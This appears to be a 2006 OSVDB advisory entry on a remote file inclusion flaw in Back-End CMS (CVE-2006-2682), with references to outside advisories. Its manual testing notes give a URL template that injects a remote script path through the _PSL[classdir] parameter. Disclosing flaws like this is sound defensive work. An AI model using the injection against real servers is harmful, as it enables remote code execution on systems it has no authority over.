Back-End CMS BE_config.php _PSL[classdir] Variable Remote File Inclusion

2006-05-25T06:04:10
ID OSVDB:25828
Type osvdb
Reporter OSVDB
Modified 2006-05-25T06:04:10

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

References:

Vendor URL: http://back-end.org/
Secunia Advisory ID: 20292
Generic Exploit URL: http://milw0rm.com/exploits/1825
FrSIRT Advisory: ADV-2006-1979
CVE-2006-2682